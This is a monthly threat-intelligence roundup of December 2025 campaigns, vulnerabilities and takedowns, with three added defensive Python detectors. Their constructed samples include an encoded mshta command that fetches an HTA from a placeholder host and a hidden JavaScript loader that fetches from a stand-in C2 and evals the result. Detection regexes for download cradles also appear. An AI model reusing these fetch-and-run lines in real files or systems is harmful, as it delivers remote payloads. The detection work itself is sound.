Cyware Monthly Threat Intelligence, December 2025

The Good
The UK, the U.S., and Portugal are taking major steps to boost cybersecurity. The UK’s NCSC launched a Cyber Essentials supply chain playbook to help businesses assess risks and monitor suppliers, in an area where only 14% of firms currently manage supplier risk effectively. In the U.S., senators reintroduced the Health Care Cybersecurity and Resiliency Act of 2025, updating HIPAA with multifactor authentication, encryption, audits, and support for rural providers. Portugal now offers a legal safe harbor for good-faith security researchers, allowing them to identify and report vulnerabilities responsibly without fear of prosecution, strengthening national digital security.
UK businesses are urged to integrate the Cyber Essentials (CE) scheme into their supply chains through a new playbook from the NCSC. This playbook outlines seven actionable steps to enhance cybersecurity, including assessing supply chain risks, defining security profiles for suppliers, and utilizing the Supplier Check tool to monitor compliance. Cybersecurity minister Liz Lloyd stressed the critical need for companies to address cyber risks within their supply chains, as only 14% of firms currently manage these risks effectively.
A bipartisan group of U.S. senators reintroduced the Health Care Cybersecurity and Resiliency Act of 2025 to strengthen healthcare cybersecurity. The bill proposes updates to HIPAA regulations, including multifactor authentication, encryption, audits, and minimum cybersecurity standards. Grants and training are suggested to offset regulatory burdens and improve cyber readiness, especially for rural healthcare providers. The legislation emphasizes the need for updated breach reporting mechanisms and guidance on corrective actions taken by regulators.
The National Defense Authorization Act (NDAA) for FY26 allocates substantial funding to enhance cybersecurity and artificial intelligence capabilities within U.S. defense and intelligence agencies. It designates $73 million for U.S. Cyber Command and mandates the harmonization of cybersecurity regulations across the Department of Defense by mid-2026. The bill also addresses foreign influence operations, particularly from Russia and China, directing agencies to bolster cybersecurity infrastructure in the Western Balkans. Key provisions include enhanced mobile phone security for senior officials and penetration testing for election systems.
Portugal has revised its cybercrime law to create a legal safe harbor for good-faith security researchers, exempting them from punishment under specific conditions. The new provision allows researchers to engage in activities previously considered illegal, such as unauthorized system access, as long as their intent is to identify vulnerabilities and enhance cybersecurity. Key conditions include the necessity of reporting discovered vulnerabilities to the system owner and the National Cybersecurity Center, ensuring actions do not disrupt services or harm systems. Researchers must not seek financial gain beyond standard compensation and must avoid using prohibited techniques like phishing or malware.
Law enforcement from Switzerland and Germany, aided by Europol and Eurojust, dismantled the Cryptomixer cryptocurrency-mixing service, which had laundered over €1.3 billion in Bitcoin since its inception in 2016. During Operation Olympia, authorities seized three servers, more than 12 terabytes of data, the service's clear web and dark web domains, and around €24 million (about $28 million) in Bitcoin. Cryptomixer pooled users’ cryptocurrency to obscure transaction origins, making it a favored tool for cybercriminals involved in drug trafficking, ransomware, and other illegal activities. This takedown follows previous actions against similar services, including ChipMixer and Blender.io, highlighting ongoing efforts to combat cryptocurrency-related crime.
The DOJ dismantled a fraudulent website, tickmilleas[.]com, which impersonated the legitimate TickMill trading platform to defraud victims. This action is part of a broader initiative by the newly formed Scam Center Strike Force, targeting scam operations linked to the Tai Chang compound in Myanmar, run by the Democratic Karen Benevolent Army. Victims were misled into believing they were making legitimate investments, often shown false returns and deposits. The DOJ has identified multiple victims who lost money through this scheme, which is part of a larger trend of scams stealing approximately $10 billion annually from Americans. Collaborating with tech companies like Meta, law enforcement has also removed thousands of scam-related accounts to combat these illicit operations.
The Bad
Researchers warn of escalating cyber threats worldwide. The China-aligned APT LongNosedGoblin has been targeting Southeast Asian and Japanese government entities since 2023, using advanced malware like NosyHistorian and NosyDoor for data theft, lateral movement, and stealthy command execution. The YouTube Ghost Network exploits compromised accounts to spread malicious videos via GachiLoader and its Kidkadi payload, using novel PE injection and anti-analysis techniques. Meanwhile, Makop ransomware is aggressively targeting Indian organizations, leveraging weak RDP credentials, GuLoader, privilege escalation, and credential-dumping tools like Mimikatz to bypass defenses and deploy encryptors efficiently.
ESET researchers have identified LongNosedGoblin, a China-aligned APT group that conducts cyberespionage against governmental entities in Southeast Asia and Japan. Active since at least September 2023, the group employs a sophisticated toolset, including malware like NosyHistorian and NosyDoor, which utilize Group Policy for lateral movement and cloud services like Microsoft OneDrive for command and control. NosyHistorian collects browser history to identify potential targets, while NosyDoor functions as a backdoor, gathering metadata and executing commands remotely. The group has demonstrated advanced evasion techniques, such as bypassing security measures and masquerading as legitimate files.
The YouTube Ghost Network is a malware distribution campaign utilizing compromised accounts to promote malicious videos, primarily targeting users interested in game cheats and cracked software. A key component of this campaign is GachiLoader, a heavily obfuscated Node.js loader that deploys additional malware, including a second-stage payload known as Kidkadi. This loader employs a novel technique called Vectored Overloading for PE injection, allowing it to manipulate legitimate DLLs to load malicious payloads. The campaign has been active for over nine months, with more than 100 videos accumulating approximately 220,000 views. GachiLoader uses various anti-analysis techniques to evade detection, such as checking for virtual environments and executing PowerShell commands to gather system information.
A critical vulnerability in React Server Components, dubbed React2Shell (CVE-2025-55182), has been exploited by a ransomware gang to gain rapid access to corporate networks, deploying file-encrypting malware within about a minute of initial access. The flaw, an insecure deserialization issue in the React Server Components Flight protocol, allows remote code execution without authentication. Following its disclosure, both nation-state hackers and cybercriminals quickly leveraged React2Shell for various attacks, including cyberespionage and cryptocurrency mining. On December 5, a threat actor used the vulnerability to launch Weaxor ransomware, a rebrand of the Mallox/FARGO operation that targets public-facing servers. The attackers executed a series of commands to disable security measures and encrypt files, leaving ransom notes with payment instructions.
A sophisticated social engineering campaign is exploiting a fake “Word Online” extension error message to distribute DarkGate malware. This attack utilizes the ClickFix technique, where users are tricked into executing malicious commands disguised as legitimate troubleshooting steps. Upon encountering a fraudulent message, victims are prompted to click a “How to fix” button, which triggers a malicious JavaScript snippet. This script decodes a hidden PowerShell command that downloads an HTA file named “dark.hta” from a compromised site. Once executed, the HTA file establishes communication with the attacker’s infrastructure, allowing for the deployment of additional malware and the theft of sensitive data.
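The ClickFix chain above leaves a characteristic process-creation event: PowerShell spawned from the Run dialog (explorer.exe), with a hidden window, an encoded command, and a download of an HTA via mshta. The triage below is an added example, not from the original report or the researchers who described the campaign: it decodes the -EncodedCommand argument (base64 of UTF-16LE), applies a few indicator patterns to the combined command line, and weights the parent process. The sample events, the placeholder domain and the HTA name are constructed.

```python
"""Triage of process-creation events for ClickFix-style PowerShell launches.

Added example (not from the original report). Sample events are constructed;
the URL and HTA name are placeholders, not observed indicators.
"""
import base64
import re
from typing import Dict, List

# PowerShell accepts any unambiguous prefix of -EncodedCommand; common short forms below.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

INDICATORS = {
    "encoded_command": ENC_FLAG,
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "download_cradle": re.compile(
        r"(?i)(Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile|Net\.WebClient)"
    ),
    "inline_exec": re.compile(r"(?i)\b(iex|Invoke-Expression)\b"),
    "hta_payload": re.compile(r"(?i)(\bmshta(\.exe)?\b|\.hta\b)"),
}

# Parents that mean "a human typed or pasted this": the Run dialog spawns from explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or ''."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def assess(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event (fields: parent, cmdline)."""
    decoded = decode_encoded_command(event["cmdline"])
    text = event["cmdline"] + "\n" + decoded
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(text)]
    payload_hit = "hta_payload" in hits or ("download_cradle" in hits and "inline_exec" in hits)
    interactive = event["parent"].lower() in INTERACTIVE_PARENTS
    if payload_hit and interactive:
        verdict = "clickfix_suspect"
    elif payload_hit:
        verdict = "suspicious"
    elif hits:
        verdict = "review"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": hits, "decoded": decoded}


def encode_command(script: str) -> str:
    """Helper used only to build the constructed samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry).
SAMPLES = [
    {   # ClickFix shape: pasted into Win+R, hidden window, encoded, fetches an HTA via mshta
        "parent": "explorer.exe",
        "cmdline": "powershell.exe -w hidden -enc "
        + encode_command("mshta http://compromised.example/dark.hta"),
    },
    {   # Ordinary interactive use
        "parent": "cmd.exe",
        "cmdline": "powershell.exe -NoProfile -Command Get-Process",
    },
    {   # Scheduled admin script: encoded but nothing else, worth a look but not an alert
        "parent": "svchost.exe",
        "cmdline": "powershell.exe -NoProfile -enc "
        + encode_command(r"Get-Service | Out-File C:\temp\services.txt"),
    },
]

if __name__ == "__main__":
    for ev in SAMPLES:
        print(assess(ev))
```

The decoded text is scanned together with the raw command line, so an operator who hides `mshta` behind -EncodedCommand still trips the HTA indicator; an encoded command on its own only earns a review, which keeps legitimate scheduled scripts out of the alert queue.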
An active phishing campaign, codenamed Operation MoneyMount-ISO, is targeting the Russian finance sector by delivering Phantom Stealer malware through malicious ISO files. Phishing emails masquerade as legitimate financial communications, urging recipients to confirm bank transfers. These emails contain ZIP archives that include ISO files, which, when executed, mount as virtual drives and launch Phantom Stealer. This malware is designed to extract sensitive information, such as cryptocurrency wallet data, Discord tokens, and browser passwords. Additionally, the campaign has seen the use of another implant called DUPERUNNER, which loads the AdaptixC2 framework. The attackers employ various tactics to compromise finance, legal, and aerospace sectors in Russia, utilizing spear-phishing techniques and redirecting users to phishing pages hosted on IPFS and Vercel to steal credentials.
Makop ransomware, a variant of the Phobos family, has evolved by incorporating techniques like privilege escalation exploits and loader malware, specifically GuLoader, into its operations. Targeting primarily Indian organizations, attackers exploit weak RDP credentials to gain initial access, followed by network scanning, lateral movement, and disabling security measures. The use of off-the-shelf tools facilitates their low-effort yet effective approach, allowing them to navigate through networks and deploy encryptors. Credential dumping tools such as Mimikatz and LaZagne are employed to harvest sensitive information, while various local privilege escalation vulnerabilities enhance their control over compromised systems.
Microsoft released its Patch Tuesday updates, addressing 57 vulnerabilities, including three zero-day flaws: one actively exploited and two publicly disclosed. The actively exploited vulnerability, CVE-2025-62221, affects the Windows Cloud Files Mini Filter Driver and allows attackers to elevate privileges to SYSTEM. The publicly disclosed vulnerabilities are CVE-2025-64671, a remote code execution flaw in GitHub Copilot for JetBrains, and CVE-2025-54100, a PowerShell vulnerability that could execute commands via the Invoke-WebRequest cmdlet. The updates also include critical fixes for remote code execution vulnerabilities in Microsoft Office and SharePoint.
Over seven years, a malware campaign has infected 4.3 million browsers through malicious VS Code extensions, notably Bitcoin Black and Codo AI. These extensions, masquerading as a harmless theme and an AI coding assistant, execute scripts that capture screenshots, steal WiFi passwords, and hijack browser sessions. The attacker evolved their methods, initially using complex PowerShell scripts before transitioning to simpler batch scripts for payload delivery. Additionally, malicious Go and npm packages utilized typosquatting techniques to impersonate trusted libraries, while a Rust package acted as a loader for further malware. DLL hijacking techniques allow the malware to leverage the legitimate Lightshot executable, making detection difficult.
The Predator spyware, developed by Intellexa, uses “Aladdin,” a zero-click infection method, delivered via malicious ads that infect devices without user interaction. The ads are funneled through a network of advertising firms across multiple countries, exploiting public IP addresses to target victims. Additional delivery vectors, such as “Triton,” exploit Samsung Exynos devices, and other methods like “Thor” and “Oberon” are suspected to exist. Intellexa has been linked to numerous zero-day exploits and remains active despite sanctions and investigations.
The Chinese APT group "Silver Fox" uses false flags, such as Cyrillic characters, to impersonate Russian threat actors while targeting organizations in China through a Microsoft Teams SEO poisoning campaign. Silver Fox deploys ValleyRAT malware for espionage and financial fraud, enabling remote control of infected systems, data exfiltration, and long-term persistence. The campaign uses fake domains like "teamscn[.]com" to lure Chinese-speaking users into downloading malware disguised as Microsoft Teams software. The infection chain involves a trojanized Microsoft Teams executable, PowerShell commands to modify antivirus exclusions, and malicious DLL files loaded into legitimate Windows processes.
MuddyWater, an Iran-aligned cyberespionage group, has intensified its operations, primarily targeting critical infrastructure in Israel and Egypt. This latest campaign showcases the group's evolution, marked by the deployment of sophisticated custom malware, including the Fooder loader and the MuddyViper backdoor. Fooder cleverly disguises itself as the classic Snake game, employing delays to evade detection, while MuddyViper facilitates extensive data collection and credential theft. The group has refined its tactics, shifting from noisy, easily detectable methods to more stealthy approaches. Additionally, MuddyWater has demonstrated collaboration with the Lyceum group, indicating a strategic focus on government and military sectors.
A fake VS Code extension, "prettier-vscode-plus," impersonated the legitimate Prettier formatter and was used to initiate a supply-chain attack. The extension delivered a multi-stage malware chain, starting with the Anivia loader and ending with OctoRAT, a fully featured remote access toolkit. The malicious GitHub repository "vscode" hosted VBScript payloads, with active payload rotation to avoid detection. The Anivia loader decrypted AES-encrypted payloads and executed them in memory, using process hollowing into legitimate Windows binaries to evade detection; OctoRAT used the same techniques and provided over 70 commands, including surveillance, file theft, privilege escalation, and cryptocurrency wallet theft.
Operation DupeHike is a cyber campaign targeting Russian corporate employees, particularly in HR and payroll sectors, using spear-phishing techniques. Attackers deploy malicious LNK files disguised as documents related to employee bonuses, which lead to the installation of the DUPERUNNER implant and the AdaptixC2 beacon. The infection begins with a ZIP file containing a decoy document that outlines internal HR policies, effectively luring victims. Upon execution, the LNK file utilizes PowerShell to download and run the DUPERUNNER implant, which performs various malicious activities, including process injection and data gathering. The AdaptixC2 beacon serves as a loader for further payloads, employing sophisticated techniques such as reflective loading and dynamic API resolution.
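Both Operation MoneyMount-ISO and Operation DupeHike arrive as a ZIP attachment whose interesting member is not a document: an ISO that mounts as a drive, or an LNK that runs PowerShell. The gateway-style check below is an added example, not tooling from either report: it recurses into nested ZIPs, flags risky member extensions, and identifies LNK and ISO 9660 content by magic bytes so that a disk image renamed to .pdf is still caught. The archive, its member names and their contents are constructed; the size cap and nesting limit are policy choices, not values from the reports.

```python
"""Gateway-style inspection of a ZIP attachment for LNK and disk-image lures.

Added example, not from the reports above. It recurses into nested ZIPs, flags
risky member extensions, and identifies LNK and ISO 9660 content by magic bytes so a
renamed image does not slip through. The archive and its members are constructed.
"""
import io
import os
import zipfile
from typing import List, Tuple

RISKY_EXT = {".lnk", ".iso", ".img", ".vhd", ".vhdx", ".hta", ".js", ".vbs",
             ".wsf", ".scr", ".exe", ".bat", ".cmd"}
# Shell Link header: HeaderSize 0x4C followed by the LNK CLSID {00021401-0000-0000-C000-000000000046}.
LNK_MAGIC = b"L\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
ISO_MAGIC_OFFSET = 0x8001  # "CD001" in the primary volume descriptor
MAX_MEMBER_BYTES = 64 * 1024 * 1024  # refuse to inflate anything larger (policy assumption)


def sniff(data: bytes) -> str:
    """Identify content by magic bytes rather than by the name the sender chose."""
    if data.startswith(LNK_MAGIC):
        return "lnk"
    if data[ISO_MAGIC_OFFSET:ISO_MAGIC_OFFSET + 5] == b"CD001":
        return "iso9660"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    return "other"


def scan_archive(data: bytes, prefix: str = "", depth: int = 0, max_depth: int = 3) -> List[Tuple[str, str]]:
    """Return (member path, reason) pairs for everything that should block delivery."""
    findings: List[Tuple[str, str]] = []
    if depth > max_depth:
        return [(prefix, "nested deeper than policy allows")]
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            ext = os.path.splitext(info.filename.lower())[1]
            if info.file_size > MAX_MEMBER_BYTES:
                findings.append((path, "oversized member, not inflated"))
                continue
            member = zf.read(info)
            kind = sniff(member)
            if ext in RISKY_EXT:
                findings.append((path, f"risky extension {ext}"))
            if kind == "lnk" and ext != ".lnk":
                findings.append((path, "Windows shortcut disguised as " + (ext or "no extension")))
            if kind == "iso9660" and ext not in (".iso", ".img"):
                findings.append((path, "ISO 9660 image disguised as " + (ext or "no extension")))
            if kind == "zip":
                findings.extend(scan_archive(member, path + "/", depth + 1, max_depth))
    return findings


def _fake_iso() -> bytes:
    """Just enough of an ISO 9660 image to carry the volume descriptor signature."""
    return b"\x00" * ISO_MAGIC_OFFSET + b"CD001" + b"\x00" * 32


def _zip(members: List[Tuple[str, bytes]]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in members:
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed attachment: an HR-themed LNK next to a nested "payment" archive that
# carries an ISO and a second ISO renamed to look like a PDF.
SAMPLE_ATTACHMENT = _zip([
    ("Bonus_policy_2025.pdf.lnk", LNK_MAGIC + b"\x00" * 56),
    ("readme.txt", b"Please review the attached documents.\n"),
    ("Payment_confirmation.zip", _zip([
        ("transfer_4471.iso", _fake_iso()),
        ("statement.pdf", _fake_iso()),
    ])),
])

if __name__ == "__main__":
    for path, reason in scan_archive(SAMPLE_ATTACHMENT):
        print(f"{path}: {reason}")
```

Extension checks alone would pass the renamed image; the magic-byte sniff is what makes the third finding. Opening the ISO contents themselves needs an ISO 9660 reader, which this example deliberately does not include.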
A malicious Rust package named evm-units has been discovered, capable of targeting Windows, macOS, and Linux systems while masquerading as an Ethereum Virtual Machine (EVM) helper tool. Uploaded to crates.io in April 2025, it garnered over 7,000 downloads before being removed. The malware checks for Qihoo 360 antivirus and executes OS-specific payloads to gain control of developer machines. On Linux, it downloads and runs a script, while on macOS, it uses osascript to execute a file. For Windows, it saves a PowerShell script in the temp directory and alters its execution based on the antivirus detection.
The Aisuru botnet has emerged as a significant threat, launching over 1,300 DDoS attacks in just three months, including a record peak of 29.7 Tbps. This botnet-for-hire service operates using millions of compromised routers and IoT devices worldwide, allowing cybercriminals to rent its capabilities for malicious purposes. The massive DDoS attacks have severely impacted various sectors, including gaming, telecommunications, and financial services, with the potential to disrupt internet service providers even when they are not direct targets. Notably, hyper-volumetric attacks have surged, with incidents exceeding 1 Tbps more than doubling quarter-over-quarter.
A seven-year campaign by the group ShadyPanda has led to the infection of 4.3 million users of Google Chrome and Microsoft Edge through malicious browser extensions. Initially appearing legitimate, these extensions gained user trust before pushing updates that introduced spyware and backdoors. Five extensions, which infected 300,000 users, allowed for remote code execution, while another five remain active in the Edge marketplace, with one, WeTab, boasting three million installs. The malware enables comprehensive browser surveillance and data theft, sending sensitive information to servers in China. Earlier campaigns included extensions that tracked user behavior and monetized browsing data.
New Threats
Researchers have uncovered multiple new cyber threats. North Korea’s Lazarus Group is deploying a cross-platform BeaverTail malware variant to target cryptocurrency traders and financial institutions via trojanized npm packages and fake job sites. Kimsuky is spreading the DocSwap Android RAT through phishing sites, QR codes, and repackaged apps like BYCOM VPN to steal credentials, keystrokes, and files. Meanwhile, the GhostPoster campaign hides malicious JavaScript in Firefox extensions, affecting over 50,000 downloads, enabling backdoor access, affiliate hijacking, CAPTCHA bypass, and invisible iframe-based ad fraud.
A newly identified variant of the BeaverTail malware has been linked to North Korea's Lazarus Group, targeting cryptocurrency traders and financial institutions for espionage and financial gain. This JavaScript-based malware functions as both an information stealer and a loader, employing advanced obfuscation techniques such as layered Base64 and XOR encoding to conceal its activities. BeaverTail is distributed through various channels, including trojanized npm packages and fake job interview platforms, exploiting trust in development workflows. Since 2022, it has evolved into a modular, cross-platform framework capable of running on Windows, macOS, and Linux, featuring keylogging, screenshot capture, and clipboard monitoring.
Kimsuky, a North Korean threat actor, has launched a campaign distributing a new variant of Android malware called DocSwap through QR codes on phishing sites that mimic the South Korean logistics firm CJ Logistics. The attackers use smishing texts and phishing emails disguised as delivery notifications to trick victims into clicking on malicious URLs. Once redirected, users are prompted to scan a QR code to download a fake shipment tracking app, which appears legitimate but contains malware. This app decrypts an embedded APK and activates a RAT that allows attackers to log keystrokes, capture audio, and access files. Additionally, Kimsuky has repackaged legitimate applications, like the BYCOM VPN, injecting malicious functionalities. The campaign also includes phishing sites that resemble popular platforms like Naver and Kakao, aimed at harvesting user credentials.
A new botnet named Kimwolf has compromised approximately 1.8 million Android-based devices, including TVs and set-top boxes, launching extensive DDoS attacks. This botnet, linked to the notorious AISURU, has executed around 1.7 billion attack commands within a short span. Primarily targeting residential TV boxes, Kimwolf infections are prevalent in countries such as Brazil, India, and the U.S. The malware utilizes advanced techniques, including DNS-over-TLS and Ethereum Name Service (ENS) domains, to enhance its resilience against takedown efforts. Notably, over 96% of the commands issued by Kimwolf focus on exploiting compromised devices for proxy services, reflecting a shift in attackers' strategies towards monetizing IoT device bandwidth.
Cellik is a new Android MaaS being marketed on underground forums, allowing attackers to create trojanized versions of legitimate apps from the Google Play Store. This malware retains the original app's interface and functionality, making it difficult for users to detect infections. Cellik offers a variety of capabilities, including real-time screen capture, notification interception, file exfiltration, and encrypted communication with command-and-control servers. It features a hidden browser mode that utilizes the victim's stored cookies and can inject malicious code into trusted apps to steal credentials. The malware's integration with the Google Play Store enables cybercriminals to select and modify popular apps, potentially bypassing Google Play Protect's security measures.
A new campaign named GhostPoster has been discovered, which conceals malicious JavaScript within the logos of Firefox extensions, affecting over 50,000 downloads. This hidden code allows attackers to monitor browser activity and establish a backdoor for high-privilege access, enabling them to hijack affiliate links, inject tracking codes, and commit click and ad fraud. Koi Security researchers identified 17 compromised extensions that utilize steganography to extract and execute the malware loader. The loader typically activates after 48 hours, fetching payloads from hardcoded domains, but it remains dormant most of the time to evade detection. The final payload can hijack affiliate commissions, strip security headers, bypass CAPTCHA protections, and inject invisible iframes for ad fraud.
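GhostPoster hides its loader inside the extension's logo image. The check below is an added example, not Koi Security's tooling: it assumes the logo is a PNG and that the hidden data sits after the IEND chunk (one common way to hide bytes in an image that viewers still render correctly, which is an assumption about the technique rather than a detail from the report). It walks the chunk list, verifies each CRC, notes private chunks, and reports any trailing bytes, with a crude test for whether they look like script. The 1x1 PNG and the appended snippet are constructed.

```python
"""Check an extension icon for bytes hidden after the image proper.

Added example, not Koi Security's tooling. Assumes a PNG logo with a payload appended
after the IEND chunk; the sample image and the appended script are constructed.
"""
import struct
import zlib
from typing import Dict

PNG_SIG = b"\x89PNG\r\n\x1a\n"
SCRIPT_MARKERS = (b"eval(", b"fetch(", b"function", b"=>", b"new Function")


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """A valid 1x1 8-bit grayscale PNG, built from scratch."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte 0 + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def scan_png(data: bytes) -> Dict[str, object]:
    """Walk the chunk list; report trailing bytes after IEND, CRC mismatches and
    private chunks (second letter lowercase), any of which deserves a closer look."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks, bad_crc, private = len(PNG_SIG), [], [], []
    end_of_image = None
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_bytes) != 4:
            break  # truncated chunk
        name = ctype.decode("latin-1")
        chunks.append(name)
        if struct.unpack(">I", crc_bytes)[0] != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            bad_crc.append(name)
        if name[1].islower():
            private.append(name)
        pos += 12 + length
        if ctype == b"IEND":
            end_of_image = pos
            break
    trailing = data[end_of_image:] if end_of_image is not None else b""
    return {
        "chunks": chunks,
        "bad_crc": bad_crc,
        "private_chunks": private,
        "trailing_bytes": len(trailing),
        "trailing_looks_like_script": any(m in trailing for m in SCRIPT_MARKERS),
        "suspicious": bool(trailing or bad_crc or private or end_of_image is None),
    }


# Constructed samples: a clean icon and the same icon with a loader appended.
CLEAN_ICON = minimal_png()
HIDDEN_LOADER = b"(function(){fetch('https://c2.example/p').then(r=>r.text()).then(eval)})();"
STEGO_ICON = CLEAN_ICON + HIDDEN_LOADER

if __name__ == "__main__":
    print("clean:", scan_png(CLEAN_ICON))
    print("stego:", scan_png(STEGO_ICON))
```

A logo that stores its payload inside a chunk (a large tEXt or zTXt, or a private chunk) rather than after IEND would only show up here through the private-chunk or size checks, so a store-side review should also compare each image's byte size against what its dimensions justify.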
A new MaaS called SantaStealer is being promoted on Telegram and hacker forums, operating in memory to avoid detection. This malware is a rebranding of BluelineStealer and is offered in two subscription tiers: Basic for $175/month and Premium for $300/month. SantaStealer employs 14 data-collection modules, each running separately to steal information from browsers, cryptocurrency wallets, and messaging apps like Telegram and Discord. It exfiltrates stolen data in chunks to a hardcoded command-and-control endpoint. Despite claims of advanced evasion techniques, current samples have shown vulnerabilities and are easy to analyze, indicating poor operational security by the developers. The exact distribution methods for SantaStealer remain uncertain, but it may involve tactics like phishing and malicious software downloads.
A new campaign is leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based RAT called PyStoreRAT. These repositories, disguised as development utilities or OSINT tools, contain minimal code that silently downloads and executes a remote HTA file. PyStoreRAT is a modular implant capable of executing various payloads, including an information stealer named Rhadamanthys. The malware is spread through loader stubs embedded in repositories that appear appealing to developers and analysts. The threat actors utilize social media for promotion and manipulate repository metrics to appear legitimate. Once executed, PyStoreRAT can profile systems, check for administrator privileges, and scan for cryptocurrency wallet files.
A newly discovered Android malware, dubbed DroidLock, can lock victims' screens for ransom while accessing sensitive data such as text messages, call logs, and contacts. This malware targets Spanish-speaking users and spreads through malicious websites that promote fake applications. Once installed, DroidLock requests Device Admin and Accessibility Services permissions, allowing it to perform various malicious actions, including changing PINs and wiping devices. The ransomware uses an overlay to demand payment from victims, threatening to destroy files if the ransom is not paid within 24 hours. Additionally, it can steal device lock patterns, enabling remote access through a VNC sharing system.
React2Shell, the critical vulnerability in React Server Components tracked as CVE-2025-55182, is being heavily exploited by threat actors to achieve unauthenticated remote code execution. Attackers are deploying various malware, including cryptocurrency miners like XMRig and backdoors such as PeerBlight, across multiple sectors, particularly construction and entertainment. Automated tools are used to exploit vulnerable Next.js instances, with notable payloads including CowTunnel, a reverse proxy, and ZinFoq, a post-exploitation framework that disguises itself as legitimate Linux services. As of December 8, 2025, over 165,000 IP addresses and 644,000 domains were identified as vulnerable, with significant impacts observed in the U.S. and Germany. The exploitation has also been linked to malware campaigns affecting more than 50 organizations globally.
A newly discovered vulnerability in the .NET Framework, known as SOAPwn, allows attackers to achieve remote code execution and arbitrary file writes in enterprise applications. This flaw arises from improper handling of Web Services Description Language (WSDL) imports and HTTP client proxies, particularly when SOAP clients are dynamically created from attacker-controlled WSDLs. By exploiting this vulnerability, threat actors can manipulate .NET Framework HTTP client proxies to write files to the file system, potentially overwriting existing files. Additionally, attackers can leverage this flaw to capture NTLM challenges, facilitating further exploitation. Despite responsible disclosures to Microsoft, the company has chosen not to address the issue, attributing it to application behavior. Some affected vendors, such as Barracuda and Ivanti, have released patches, while the vulnerability in Umbraco 8 remains unaddressed due to its end-of-life status.
Four distinct threat clusters have emerged utilizing the CastleLoader malware, indicating its distribution under a MaaS model by the actor known as GrayBravo. This group, previously identified as TAG-150, exhibits rapid development cycles and technical sophistication. Notable tools in their arsenal include CastleRAT and CastleBot, which facilitate the delivery of various malware families such as DeerStealer and RedLine Stealer. The clusters employ diverse tactics, including phishing campaigns targeting the logistics sector and impersonation of legitimate brands like Booking[.]com. GrayBravo has established a multi-tiered infrastructure, leveraging compromised accounts on freight-matching platforms to enhance the credibility of its phishing efforts.
Google has released a security update for Chrome to address a high-severity zero-day vulnerability that is actively being exploited. This vulnerability, which currently lacks a CVE identifier, is tracked under bug tracker ID 466192044 and may involve memory corruption issues within the V8 JavaScript engine. The nature of the exploit suggests it could enable sandbox escapes and remote code execution, raising concerns about targeted attacks, particularly from government-sponsored espionage campaigns. Alongside the zero-day fix, the update also addresses two medium-severity vulnerabilities related to the browser’s password manager and toolbar component.
MuddyWater, an Iranian hacking group, has been observed deploying a new backdoor known as UDPGangster, utilizing the User Datagram Protocol (UDP) for C2 operations. This cyberespionage campaign targets users in Turkey, Israel, and Azerbaijan through spear-phishing tactics that involve sending booby-trapped Microsoft Word documents. These documents, disguised as invitations to a seminar from the Turkish Republic of Northern Cyprus Ministry of Foreign Affairs, prompt users to enable macros, which execute embedded malicious code. The UDPGangster payload establishes persistence by modifying the Windows Registry and incorporates extensive anti-analysis checks to evade detection. Once operational, it gathers system information and connects to an external server over UDP to exfiltrate data, execute commands, and deploy additional payloads.
FvncBot, a new Android banking trojan, has been targeting Polish users, disguised as a security app developed by mBank. The malware payload includes features like keylogging, web-inject attacks, screen streaming, and hidden virtual network computing (HVNC) for financial fraud. FvncBot’s code is entirely new and not derived from other Android trojans like Ermac or Hook. The malware uses Android’s accessibility services to capture sensitive user data, including passwords and one-time passwords (OTPs). It implements advanced H.264 video compression for low-latency screen streaming, which is more efficient than traditional JPEG streaming.
A new strain of CoinMiner malware is spreading via USB drives in South Korea, targeting workstations for Monero cryptocurrency mining. The infection process involves a malicious shortcut file (.lnk) that executes scripts to load malware using DLL Side-Loading techniques. The malware creates deceptive directories and employs trusted Windows components to bypass antivirus detection. The payload, PrintMiner, maximizes mining efficiency while employing stealth tactics like bypassing Windows Defender and pausing activity during high-resource tasks.
A high-severity vulnerability (CVE-2025-66476) has been discovered in Vim for Windows, allowing attackers to execute arbitrary code through an uncontrolled search path issue. The flaw, rated with a CVSS score of 7.8, affects versions earlier than 9.1.1947. It enables an attacker to plant a malicious executable in a location that Vim searches before the legitimate binary's location, so that Vim runs the planted file in place of the intended program. The vulnerability can be exploited without administrative privileges. The issue has been resolved in version 9.1.1947, and users are urged to update immediately.
